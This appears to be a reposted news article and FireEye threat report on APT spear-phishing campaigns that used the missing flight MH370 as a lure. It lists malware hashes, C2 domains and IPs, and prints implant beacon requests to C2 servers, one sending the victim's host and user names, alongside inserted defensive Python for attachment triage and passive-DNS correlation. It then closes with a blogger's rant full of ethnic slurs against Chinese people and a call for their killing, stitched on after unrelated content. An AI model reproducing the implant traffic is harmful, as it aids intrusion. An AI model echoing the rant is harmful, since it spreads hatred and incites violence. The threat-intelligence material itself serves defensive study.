http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
Malaysian flight MH370 tragedy abused by Chinese hackers for Espionage attacks
Wednesday, March 26, 2014 Editor: Wang Wei
The mysterious Malaysian Airlines flight MH370, a Boeing 777-200 aircraft, went missing while flying from Kuala Lumpur to Beijing. The Malaysian Prime Minister has also confirmed that the Malaysia Airlines plane crashed in a remote part of the southern Indian Ocean.
Cyber criminals are known to take advantage of major news stories or events where there is a high level of public interest, and now scammers are also exploiting the MH370 tragedy to trap innocent Internet users.
Just a few days ago, we warned you about a Facebook malware campaign (http://thehackernews.com/2014/03/beware-of-new-facebook-malware-claims.html) that claimed the missing Malaysian Airlines 'MH370 has been spotted in the Bermuda Triangle' with its passengers still alive and invited users to click a link to view breaking news video footage.
This week, security researchers at FireEye revealed various ongoing spear-phishing and malware attacks by some advanced persistent threat (APT) attackers.
According to the researchers, the Chinese hacking group called 'admin@338', which specializes in cyber espionage attacks, sent multiple MH370-themed spear-phishing emails to government officials in Asia-Pacific, with an attachment referring to the missing Malaysian flight MH370.
The attachment file was actually merged with Poison Ivy RAT (remote access tool) and WinHTTPHelper malware to hijack the computer systems of government officials.
The Chinese hacking group also initiated another attack against a US-based think tank on 14th March. A malicious attachment named “Malaysian Airlines MH370 5m Video.exe” was delivered via spear-phishing emails. The malicious attachment pretended to be a Flash video related to the missing plane, with a 'Flash' icon attached to the executable file.
"In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild," researchers said.
More technical details and various attacks are explained on the FireEye blog. If you receive an email or any message on social media websites claiming to have information or news on Malaysian Airlines Flight MH370, do not click on any links or attachments.
Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370
March 24, 2014 | Advanced Malware, Targeted Attack, Threat Intelligence, Threat Research
While many advanced persistent threat (APT) groups have increasingly
embraced strategic Web compromise as a malware delivery vector, groups
also continue to rely on spear-phishing emails that leverage popular
news stories. The recent tragic disappearance of flight MH 370 is no exception.
This post will examine multiple instances from different threat groups,
all using spear-phishing messages and leveraging the disappearance of
Flight 370 as a lure to convince the target to open a malicious
attachment.
“Admin@338” Targets an APAC Government and US Think Tank
The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.
The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group's activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:
IP Address | First Seen | Last Seen |
103.31.241.110 | 2013-08-27 | 2013-08-28 |
174.139.242.19 | 2013-08-28 | 2013-08-31 |
58.64.153.157 | 2013-09-03 | 2014-03-07 |
59.188.0.197 | 2014-03-07 | 2014-03-19 |
A second targeted attack attributed to the same Admin@338 group was sent to a prominent US-based think tank on March 14, 2014. This spear phish contained an attachment that dropped “Malaysian Airlines MH370 5m Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.
Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn't exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper. The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks.
This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:
IP Address | First Seen | Last Seen |
31.193.133.101 | 2013-11-01 | 2013-11-29 |
58.64.153.157 | 2014-01-10 | 2014-03-08 |
59.188.0.197 | 2014-03-14 | 2014-03-17 |
139.191.142.168 | 2014-03-17 | 2014-03-19 |
The www.dpmc.dynssl[.]com domain resolved to the following IPs:
IP Address | First Seen | Last Seen |
31.193.133.101 | 2013-10-30 | 2013-11-29 |
58.64.153.157 | 2014-01-10 | 2014-03-08 |
59.188.0.197 | 2014-03-14 | 2014-03-18 |
139.191.142.168 | 2014-03-17 | 2014-03-19 |
Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy discussed above also resolved to both 58.64.153.157 and 59.188.0.197 during the same time frame as the Backdoor.APT.WinHTTPHelper command and control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.
In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.
The Naikon Lures
On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe” (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.
It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:
MD5 | Import hash | CnC Server |
fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | ecoh.oicp[.]net |
018f762da9b51d7557062548d2b91eeb | e30e07abf1633e10c2d1fbf34e9333d6 | orayjue.eicp[.]net |
fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | ecoh.oicp[.]net:443 |
498aaf6df71211f9fcb8f182a71fc1f0 | a692dca39e952b61501a278ebafab97f | xl.findmy[.]pw |
a093440e75ff4fef256f5a9c1106069a | a692dca39e952b61501a278ebafab97f | xl.findmy[.]pw |
125dbbb742399ec2c39957920867ee60 | a692dca39e952b61501a278ebafab97f | uu.yahoomail[.]pw |
52408bffd295b3e69e983be9bdcdd6aa | a692dca39e952b61501a278ebafab97f | net.googlereader[.]pw |
This malware leverages “pdfbind” to add a PDF into itself, as can be seen in the debugging strings, and when launched, the malware also presents a decoy document to the target:
The Plat1 Lures
On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to 59.188.253.216 via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:
C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64)
C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)
The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:
E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdb
F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb
This malware family was also described in more detail here.
The Mongall/Saker Lures
Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:
GET /3010FC080[REDACTED] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
Host: comer4s.minidns.net:8070
Cache-Control: no-cache
The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:
The “Tranchulas” Lures
On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by Pakistan.zip” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on 199.91.173.43. This IP address was previously used to host malicious files.
The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to 199.91.173.45. This IP address was previously used to host a file entitled “obl_leaked_report.zip” (MD5: a4c7c79308139a7ee70aacf68bba814f).
The initial beacon to the command-and-control server is as follows:
POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1
Host: 199.91.173.45
Accept: */*
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
This same control server was used in previous activity.
The Page Campaign
A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 – FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to 122.10.89.85 on both port 80 and 443. The initial beacon traffic over port 80 is as follows:
GET /18110143/page_32180701.html HTTP/1.1
Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: 122.10.89.85
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Conclusion
While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.
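A mail-gateway style triage of the lure attachments described in this post, as an added example that is not FireEye's code: it flags executable extensions hidden behind document names, padded double extensions, document names whose content is a PE or HTA/HTML file, and looks one level into ZIP archives. The file names come from the post; the byte contents, the ZIP member name and all function names are constructed for illustration.

```python
import io
import os
import zipfile

# Extensions Windows runs on double-click, including the .scr and .hta forms used by the lures.
EXECUTABLE_EXTS = {".exe", ".scr", ".hta", ".com", ".pif", ".lnk"}
# Extensions a recipient reads as "just a document or video".
DECOY_EXTS = {".doc", ".docx", ".pdf", ".xls", ".rtf", ".flv", ".mp4"}

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .doc/.xls container header
SCRIPT_MARKERS = (b"<hta:application", b"<script", b"<html")


def name_findings(filename):
    """Flag names whose real (last) extension is executable, noting any decoy extension."""
    base = os.path.basename(filename.replace("\\", "/")).strip()
    stem, ext = os.path.splitext(base)
    findings = []
    if ext.lower() in EXECUTABLE_EXTS:
        findings.append("executable-extension")
        inner = os.path.splitext(stem.rstrip())[1].lower()
        if inner in DECOY_EXTS:
            # Whitespace between ".pdf" and ".exe" pushes the real extension out of view.
            padded = stem != stem.rstrip()
            findings.append("padded-double-extension" if padded else "double-extension")
    return findings


def content_findings(filename, head):
    """Flag leading bytes that contradict a document-style extension."""
    ext = os.path.splitext(filename.strip())[1].lower()
    if ext not in DECOY_EXTS:
        return []
    if head.startswith(b"MZ"):
        return ["pe-content-under-document-name"]
    is_real_doc = head.startswith(OLE_MAGIC) or head.startswith(b"{\\rt")
    if ext == ".doc" and not is_real_doc:
        lowered = head[:512].lower()
        if any(marker in lowered for marker in SCRIPT_MARKERS):
            return ["script-content-under-document-name"]
    return []


def triage(filename, data):
    """Return findings for one attachment, descending one level into ZIP archives."""
    findings = name_findings(filename) + content_findings(filename, data[:512])
    if data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                with archive.open(info) as member:
                    head = member.read(512)  # only the header bytes are needed
                inner = name_findings(info.filename) + content_findings(info.filename, head)
                findings.extend(f"{info.filename}: {item}" for item in inner)
    return findings


def build_zip(member_name, payload):
    """Build an in-memory ZIP for the constructed sample below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(member_name, payload)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x00" * 62  # constructed stand-in for a PE header, not a real sample
SAMPLES = [
    ("Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe", FAKE_PE),
    ("Malaysian Airlines MH370 5m Video.exe", FAKE_PE),
    ("Missing Malaysia Airlines Flight 370.doc", b"<html><head><hta:application id=a></head></html>"),
    # The member name inside the ZIP is not given in the post; this one is constructed.
    ("Malysia Airline MH370 hijacked by Pakistan.zip", build_zip("hijack report.pdf.scr", FAKE_PE)),
    ("meeting agenda.doc", OLE_MAGIC + b"\x00" * 64),  # benign control
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, "->", triage(name, data) or "no findings")
```

The Flash-icon sample is caught only because its name ends in .exe; icon spoofing itself is invisible to a name check, which is why the content check runs alongside it.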
Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.
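The infrastructure overlap noted in the Admin@338 section can be reproduced from the three passive-DNS tables. This added example (not part of the original post; function names are illustrative) intersects the first-seen/last-seen windows for every IP two domains share.

```python
from datetime import date
from itertools import combinations

# Rows copied from the three passive-DNS tables in the post:
# domain -> [(ip, first_seen, last_seen)]
PDNS = {
    "www.verizon.proxydns[.]com": [
        ("103.31.241.110", "2013-08-27", "2013-08-28"),
        ("174.139.242.19", "2013-08-28", "2013-08-31"),
        ("58.64.153.157", "2013-09-03", "2014-03-07"),
        ("59.188.0.197", "2014-03-07", "2014-03-19"),
    ],
    "dpmc.dynssl[.]com": [
        ("31.193.133.101", "2013-11-01", "2013-11-29"),
        ("58.64.153.157", "2014-01-10", "2014-03-08"),
        ("59.188.0.197", "2014-03-14", "2014-03-17"),
        ("139.191.142.168", "2014-03-17", "2014-03-19"),
    ],
    "www.dpmc.dynssl[.]com": [
        ("31.193.133.101", "2013-10-30", "2013-11-29"),
        ("58.64.153.157", "2014-01-10", "2014-03-08"),
        ("59.188.0.197", "2014-03-14", "2014-03-18"),
        ("139.191.142.168", "2014-03-17", "2014-03-19"),
    ],
}


def to_windows(rows):
    """Group resolution windows by IP; one IP may appear in several rows."""
    windows = {}
    for ip, first, last in rows:
        windows.setdefault(ip, []).append(
            (date.fromisoformat(first), date.fromisoformat(last))
        )
    return windows


def shared_windows(rows_a, rows_b):
    """Return (ip, start, end) for each period in which both domains resolved to ip.

    First/last seen are observation bounds from the sensor, so an overlap
    means "both were observed on this IP within this span", not proof of
    continuous co-hosting.
    """
    a, b = to_windows(rows_a), to_windows(rows_b)
    hits = []
    for ip in sorted(a.keys() & b.keys()):
        for a_first, a_last in a[ip]:
            for b_first, b_last in b[ip]:
                start, end = max(a_first, b_first), min(a_last, b_last)
                if start <= end:  # same IP at disjoint times is not an overlap
                    hits.append((ip, start.isoformat(), end.isoformat()))
    return hits


def pairwise_overlaps(pdns):
    """Compare every pair of domains and keep only pairs with a shared window."""
    result = {}
    for dom_a, dom_b in combinations(sorted(pdns), 2):
        hits = shared_windows(pdns[dom_a], pdns[dom_b])
        if hits:
            result[(dom_a, dom_b)] = hits
    return result


if __name__ == "__main__":
    for (dom_a, dom_b), hits in pairwise_overlaps(PDNS).items():
        for ip, start, end in hits:
            print(f"{dom_a} / {dom_b}: {ip} shared {start}..{end}")
```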
FireEye = http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html
http://www.fireeye.com/kr/ko/
'' chinaman rogue hackers are doing a bad thing to do,
Pretend goodness,, heart spiteful, Communist mainland also credible it ???
Look at yesterday's violence was arranged in Hong Kong triad police posing as peace
'' Umbrella campaign '' participants will be aware of the continent hybrids conspiracy, hehe.
No education / parenting Chinaman do not always standard "horse monkey"
Lower means so self-deception, not afraid of falling again by the international community for Fallon
'' The most fake country '' to ridicule ... haha ..
Look at those slaves Zhang claw Dengmu sort of true and false ???
Technology's taught me to look at my intellect have quality channels.
When the tube was Chinaman extinction.
Our aim, with Hong Kong students on the same side.
No matter what a mercenary corruption,
Remember human rights and dignity of most non-Yee
You must be framed hybrid Chinaman killed.! ''
For Hong Kong '' umbrella campaign '' peace warrior and write ``
Indistinct small Melody.blog Sincerely ~
http://melody-free-shaing.blogspot.com/2014/11/by-hacker-news-malaysia-flight-mh370.html